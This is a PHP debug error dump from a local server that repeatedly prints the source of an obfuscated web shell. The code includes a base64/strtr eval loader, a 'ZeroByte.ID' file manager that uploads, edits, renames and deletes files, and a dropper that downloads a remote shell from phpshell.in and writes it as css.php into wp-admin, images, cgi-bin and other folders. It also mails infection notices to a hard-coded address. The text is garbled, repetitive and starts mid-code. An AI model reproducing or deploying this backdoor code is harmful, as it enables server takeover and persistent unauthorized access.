'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1031539504fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:106
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 107
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1059539504fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:107 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/includes/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 115
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1308539504fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:115
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 116
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1346539504fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:116
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 117
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 